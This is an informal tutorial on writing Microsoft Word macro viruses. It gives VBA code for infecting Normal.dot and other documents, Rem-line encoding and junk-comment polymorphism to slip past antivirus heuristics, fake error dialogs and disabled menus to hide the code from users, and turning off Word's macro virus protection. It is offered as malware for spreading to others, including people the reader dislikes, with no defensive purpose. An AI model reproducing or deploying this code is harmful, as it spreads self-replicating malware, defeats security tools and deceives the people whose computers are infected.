The MacroVirusWriting Tutorial by anonymous

Introduction
In this document, I assume you are an beginner at MacroVirus writing (but for more advanced people there is handy information in here too!). If you have not yet programmed a virus yet, do not skip parts! Before we begin, I advice you to make a copy of your normal.dot incase you (or we) screw something up in it. So let's begin.

What's A MacroVirus
A MacroVirus, which i am now reffering to as a MV (saving my fingers) is an virus made in words visual basic, or other macro supporting programs. The best Word version to make a virus in is to my knowledge Word97, because you can turn off Macro's and view there source. Virusses made in this language may look nonharming (Word elements always look so cudly) but they can destroy someones computer! A MV (a one that likes to spread itself afcourse) can be spread multiple ways, but the main function used to do this is copying itself to the normal.dot. (Normal.dot is the main template used by activedocuments.). If a new document is opened, that uses the infected template, the virus copies it to that document (if it's not there already afcourse). If you can almost not wait to begin after reading this, you'll probably become a good (M)Vprogrammer.

Starting to write
An MV is started when Word starts an event. The mainevents are displayed below:
AutoExec() - Infects when word/document is opened. But I don't reccomend you using this too much since an higher protection level in Word disables this but Document_Open not.
Document_Open() - Basically the same as AutoExec
AutoExit() - Infects when an Document is closed
Document_Close() - Almost same as AutoExit
FileSave() - Infects when document is saved (this is a little bit harder because you have to replace the save function etc )
FileSaveAs() - I think this one is clear
ToolsSpelling() - Infects on spelling check
ToolsGrammar() - Infects on grammar check
And finally:
ViewVBCode(), ToolsMacro() and FileTemplates() - mainly used for stealth (so the user cannot see your virus's code)

How to inplement this is not very hard. Just open your Word97/2000 select Extra, then Macro and VisualBasiceditor. It can mostly also be started by pushing Alt+F11. Then, in the new opened screen, push the Screen button and ProgramCode. Now you have a white screen where you can typ in :-)
Oke then, typ or copy the following (ey, you can thank me for manually colour coding codes later)

Sub Document_Open()
MsgBox "Hello World", vbInformation
' Not a very original line I agree
End Sub

Ok, now push the play button (something like this l>). Yay an message box telling you 'Hello World'! (The green line behind it was only comment), if you pushed save now, closed the document and opened it again it would say 'Hello World' again (after probably a warning message about Macro's, how to deactivate those warinings comes later). But don't send this to all your friends yet! It will get a lot more fun (writing this chapter was a pain in my ass :-)).

So, to resume on the message boxes, i'll give you another code that will give three message boxes (believe me, it'll come in handy later)

Sub Document_Open()
For i = 1 To 3
MsgBox "Counting 1 to 3", vbInformation
Next i
End Sub

Ok, you get this right? For each (no decimal) number between (and including) 1 and 3 display an message box. Ok, now afcourse you can put for 3 10000000000 and send it to someone you don't like (get the picture), but that's really isn't a MV.

Infecting doc files
Jumping to this chapter so fast may seem odd to you, but between displaying a messagebox and infecting a file isn't so much difference.

Ok, you now know how to open the Programcode screen. Now you need to make a new module (I mainly use modules so I teach you howto). Push Insert (next to Screen) and Module. A new white screen opens.

Well, I've told you how infection takes place (from infected doc to normal template and from normal template to other documents). So why not make a function that checks the normal template for infection, and if it's not infected, infect it!

Sub Document_Open() ' When your document is opened
bp = "C:\Windows\tempx.txt" ' temp virus holder
If NormalTemplate.VBProject.VBComponents.Count = 1 Then ' If there is only one component then...
ActiveDocument.VBProject.VBComponents.Item(2).Export(bp)
' Copy the module to tempx.txt
NormalTemplate.VBProject.VBComponents.Import(bp)
' Let NormalTemplate import the virus
End If ' Close If
End Sub

Well, the above basically says: If there is only one component (called ThisDocument) NormalTemplate has not been infected yet, otherwise it would have been 2. So then copy the ActiveDocument's module (the virus) to tempx.txt and let NormalTemplate copy the virus to itself.

Afcourse this simple MV wouldn't be complete without the function of copying the virus from the NormalTemplate to (another, not yet infected ActiveDocument). This is not too hard to come up with.

Sub Document_Close() ' When a document is closed
bp = "C:\Windows\tempy.txt" ' temp virus holder
If ActiveDocument.VBProject.VBComponents.Count = 1 Then ' If there is only one component then...
NormalTemplate.VBProject.VBComponents.Item(2).Export(bp)
' Copy the module to tempy.txt
ActiveDocument.VBProject.VBComponents.Import(bp)
' Let ActiveDocument import the virus
End If ' Close If
End Sub

Saw how easy this is? I just switched ActiveDocument and NormalTemplate and done, we have created a real live MV! But if you're thinking about saving this and doing something with it, think twice. Your AntiVirus (I assume you have one) will probably delete, or quarantine it at once (this will also happen with someone you send it to). So we goto the next chapter, avoiding AntiVirus detection. (Avoiding User detection will come too).

Avoiding AntiVirus detection
This may be the hardest part of MV programming. In an AntiVirus (the most common used are McAfee and NortonAntiVirus) there is a component called BloodHound (in Norton it's called that way). BloodHound doesn't watch files for known virusses, but for signs of virusses. With MV's these signs are mostly the use of funtions often used by virusses. So, what to do about it? Create another route to obtain the same objective. First, think about how the AV catches your virus. Then come up with a way to avoid detection, and finally implement it. If your own AV catches you, back to step one. So what about a little example.

Sub Document_Open()
bp = "C:\Windows\tempx.txt"
If NormalTemplate.VBProject.VBComponents.Count = 1 Then
ActiveDocument.VBProject.VBComponents.Item(2).Export(bp)
NormalTemplate.VBProject.VBComponents.Import(bp)
End If
End Sub
Sub
Document_Close()
bp = "C:\Windows\tempy.txt"
If ActiveDocument.VBProject.VBComponents.Count = 1 Then
NormalTemplate.VBProject.VBComponents.Item(2).Export(bp)
ActiveDocument.VBProject.VBComponents.Import(bp)
End If
End Sub

Here you can see how the AV thinks. When searching thru your infected document it flags (now underlined) known virus parts. It then adds them up and voila, byebye virus.

In this case the AV has learned to flag a document as infected if it reads at least one Export and two Imports (this could be changed by now, so I'm learning you to think as the AV). This is very smart, but not smart enough to stop us from making a none detectable virus.

So, what can we do to stop the AV from flagging those three things. Encrypting your virus is an option that is likely to work, but hard to accomplish manually (it's not fun). It's less hard if you just use an existing one. Then you let the encryptor call your functions for Document_Open AutoExec Document_Close etc. Keep in mind It's is not as easy as it seems because if you infect an file with your virus, the encryptor has to be taken along with it (in another module). And it has to be run someway to encrypt the virus again. Are you still with me?

So the first step is to alter our virus so it can be properly encrypted. First we change the function names from Document_Open and Document_Close to ua and ub (i'm really good at making names :-P). We also make sure the encryption module also is copied (we don't want viruswarnings remember). We also add, for stealth (it's another chapter, but it'll come handy now), On Error Resume Next. This is the first module then:

Sub ua()
On Error Resume Next ' Don't alert the user or anything if something go's wrong
bp = "C:\Windows\tempx.txt"
If NormalTemplate.VBProject.VBComponents.Count = 1 Then
ActiveDocument.VBProject.VBComponents.Item(2).Export(bp)
NormalTemplate.VBProject.VBComponents.Import(bp)
ActiveDocument.VBProject.VBComponents.Item(3).Export(bp)
' also copy the encryptor
NormalTemplate.VBProject.VBComponents.Import(bp)
End If
End Sub
Sub
ub()
On Error Resume Next ' Same here
bp = "C:\Windows\tempy.txt"
If ActiveDocument.VBProject.VBComponents.Count = 1 Then
NormalTemplate.VBProject.VBComponents.Item(2).Export(bp)
ActiveDocument.VBProject.VBComponents.Import(bp)
NormalTemplate.VBProject.VBComponents.Item(3).Export(bp)
ActiveDocument.VBProject.VBComponents.Import(bp)
End If
End Sub

You see, copying the encryptor isn't hard. Now we have to decide wether we want to make a encoder/decoder ourself or use an existing one (and maybe alter it somewhat). For the ease, I use an existing one (which I have created by the way, but just retrieved from storage). It doesn't really matter which one we pick (as long as it is not detected by an AV) because it isn't a polymorphic generator (it doesn't need fancy changing functions). So we have picked one, and we are now gonna have to change some of the functions in the encoder/decoder as well.

Rem The Rem Encoder
Sub
encode()
On Error Resume Next
Set aol = ActiveDocument.VBProject.VBComponents
Set ni = aol.Item(2).CodeModule ' our virus in the ActiveDocument
For i = 1 To ni.CountOfLines
ni.InsertLines i * 2 - 1, "Rem _"
' Place a Rem so word and the AV sees it as comment
Next i
Set lao = NormalTemplate.VBProject.VBComponents
Set op = lao.Item(2).CodeModule ' our virus in the NormalTemplate
For a = 1 To op.CountOfLines
op.InsertLines a * 2 - 1, "Rem _"
Next a ' Run the alghorithm again for the next a
End Sub
Sub decode()
On Error Resume Next
Set aol = ActiveDocument.VBProject.VBComponents
Set ni = aol.Item(2).CodeModule
For i = 1 To ni.CountOfLines
If ni.Lines(i, 1) = "Rem _" Then ' If the line is 'Rem _' then...
ni.DeleteLines i, 1
' delete it
End If
Next i
Set lao = NormalTemplate.VBProject.VBComponents
Set op = lao.Item(2).CodeModule
For a = 1 To op.CountOfLines
If op.Lines(a, 1) = "Rem _" Then
op.DeleteLines a, 1
End If
Next
a
End Sub
Sub FileSave()
On Error Resume Next
Application.Run ("ua") ' run our two functions,
Application.Run ("ub")
' so if the user saves, the virus will be too
Application.Run ("encode")
' encode our virus so the AV won't see it
If ActiveDocument.FullName = ActiveDocument.Name Then ' if it's not saved yet then ...
Dialogs(wdDialogFileSaveAs).Show
' show the saveas dialog
Else ' otherwise...
Document.Save
' just save it
End If
Application.Run ("decode")
' decode our virus since the document is saved
End Sub
Sub FileSaveAs()
On Error Resume Next
decode: decode
Application.Run ("ua")
Application.Run ("ub")

Application.Run ("encode")
Dialogs(wdDialogFileSaveAs).Show
' after encoding the virus, show the window the user has asked for
Application.Run ("decode")
End Sub
Sub AutoClose()
On Error Resume Next
decode: decode ' one decode would have been enough though (just to be sure)
Application.Run ("encode")
' encode so if the document gets saved, the AV won't see it
If
ActiveDocument.FullName = ActiveDocument.Name & document.saved Then ' if the document was not saved yet then..
Else
' but if it was saved .....
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub

Ok, that isn't so hard to understand (since I commented and colourcoded the entire code!). If you make a new document, open the vbeditor, make two modules an paste this code in them, close the editor, and press the save button in your document....it works! Jay! (except if your AV has been updated so it deletes it anyways, but let us not think about that). .

Now there is something left, what we could (no must) do. Make the virus Polymorphic (self changing). Don't panic, a polymorphic virus doesn't make changes in its functions (not the simple one we are going to use), it just adds random junk to your code (comments). A function that does that isn't so hard to come up with (although I spent half an hour making this one).

Rem DoubleC (simple polymorphic generator)
Sub
doubleC()
On Error Resume Next
For t = 1 To 2
If t = 1 Then Set hat = ActiveDocument.VBProject
If t = 2 Then Set hat = NormalTemplate.VBProject
For l = 2 To hat.VBComponents.Count
Set rat = hat.VBComponents.Item(l).CodeModule
AB = Application.UserAddress
' We're going to use the usersadress for storage :-P
For i = 1 To rat.CountOfLines
Application.UserAddress = "": chello = rat.Lines(i, 1): adde = 0
' define chello is line ..., save spave using :
For a = 1
To Len(chello) ' For every character of chello
If Mid(chello, a, 4) = " '" + "'" Or adde = 1 Then
adde = 1
' If the three following characters are [space]'' then adde = 1
Else
Application.UserAddress = Application.UserAddress & Mid(chello, a, 1)
' add a char. of the line it's using
End If
Next
a
Application.UserAddress = Application.UserAddress & " '" + "' " + Chr(Int((100 * Rnd) + 34)) + Chr(Int((100 * Rnd) + 34)) + Chr(Int((100 * Rnd) + 34)) + Chr(Int((100 * Rnd) + 34))
' make a random string and add it
rat.ReplaceLine i, Application.UserAddress
' replace the old, with the new line
Next i
Application.UserAddress = AB
' nicely return the users his adress, we before saved
Next l: Next t
End Sub

Fiew, that wasn't as long as you feared, was it :-). Now the difference between the encoder and polymorphic generator is that the polymorphic generator also makes itself polymorphic, and the encoder not.

We then place the polymorphic generator within the (not yet encrypted) virus module, so it will be encrypted, too. This is much saver because loads of AV's see polymorphic generators alone already as viruses.we then replace the Save Function of the encryptor with this one (basically the same but with one added function).

Sub FileSave()
On Error Resume Next
doubleC
' We've only added this line
Application.Run ("encode")
If ActiveDocument.FullName = ActiveDocument.Name Then
Dialogs(wdDialogFileSaveAs).Show
Else
Document.Save
End If
Application.Run ("decode")
End Sub

Oke then. All of this done and we have an selfencoding, (simple) polymorphic macrovirus.

But what if the user becomes suspicious, looks in the VBProject of Word, sees the virus and starts deleting it manually? Read on...

Avoiding user detection
You could say this chapter is less hard. AV's are updated every day but methods to fool (stupid) users can stay the same for years.

The main way for stealth is disabling the screens who can tell the users macros are in the document. The easiest way is by disabling the screens by replacing them for fake errors. Keep in mind that adding them should be the last you do. Otherwise you can't access your own virus code anymore :-(.

Ok, first we disable the VBScreen. We do this by adding this code to the (virus) module.

Sub ViewVBCode()
MsgBox "Cannot find ''RMac14dl.dll'' in cdx000892315", 16, "VBEdit"
' A really creative error line
End Sub

Then disable the Macro's screen... (with the same error)

Sub ToolsMacro()
MsgBox "Cannot find ''RMac14dl.dll'' in cdx000892315", 16, "VBEdit"
' the same error
End Sub

Disable yet another screen

Sub FileTemplates()
MsgBox "Cannot find ''RMac14dl.dll'' in cdx000892315", 16, "VBEdit"
End Sub

You can accomplish this also by making a new userform (and make it look like an empty macros... screen) and calling it by the following code. The only problem with it, is that if you use this second way (a lot more convincing way) your virus has to take it with it (the code below and the userform files (2) ).

Sub Filetemplates()
On Error GoTo Error
UserForm1.Show
' Show the userform you've made
Error:
' I found this written by Talon - The Eifel Epidemic
End Sub

Ok, now we have disabled the two main ways users can use to access your virus. Now let us disable some other things that may give away our virus. The most smart thing to do is to put them in Document_Open.

Sub Document_Open()
On Error Resume Next
CommandBars("Tools").Controls("Customize...").Enabled = False
' disable the Customize... in Tools
CommandBars("View").Controls("Toolbars").Enabled = False
' etc...
CommandBars("View").Controls("Status Bar").Enabled = False
' i got these from xde
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
CommandBars("Format").Controls("Style...").Enabled = False
NormalTemplate.Saved = True
' if you make a change to normaltemplate, don't alert user
Options.VirusProtection = False ' very important in word97, enable macros without alert in future
End Sub

There are a lot of other ways to hide from users, but I'll leave them to you (you can search on google for them etc.). But what is the use of all these methods, if you're virus doesn't do anything, if it's just like a worm.

Making a payload

A payload is the part what makes a virus a virus. It's the pain in your belly when you have the flue. You can come up with a number of things. From just a simple alert to something really great. I'll also will leave this to you, because i'm tired of explaining this :).

My thanks goto: All those people who have written tutorials about virusses and ordinary stuff.

ps: During the last hour an annoying fly has been circling above my head, now i'm going to get up and smash it!